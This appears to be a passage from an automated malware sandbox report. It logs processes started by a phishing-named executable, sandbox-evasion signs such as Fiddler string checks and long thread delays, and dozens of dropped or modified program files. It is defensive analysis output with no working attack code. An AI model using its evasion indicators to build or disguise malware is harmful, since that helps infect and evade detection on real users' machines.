                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7088, type: MEMORYSTR
                        Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_007352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 7_2_007352A0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 10_2_009952A0
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C052A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_00C052A0
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeAPI/Special instruction interceptor: Address: B4C26C
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeAPI/Special instruction interceptor: Address: D0DAF4
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeAPI/Special instruction interceptor: Address: B5370C
                        Source: Grinnellia.exe, 00000008.00000002.2099585917.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000002.2252760529.0000000000CCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073509147.0000000000DA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEZ
                        Source: Grinnellia.exe, 0000000B.00000002.2128861465.0000000000C4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEBRBB
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 9E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2460000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 4460000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 5820000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2D820000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeMemory allocated: 1490000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeMemory allocated: 3110000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeMemory allocated: 3010000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 3030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 3230000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 5230000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,13_2_004019F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5777
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1850
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 1324
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
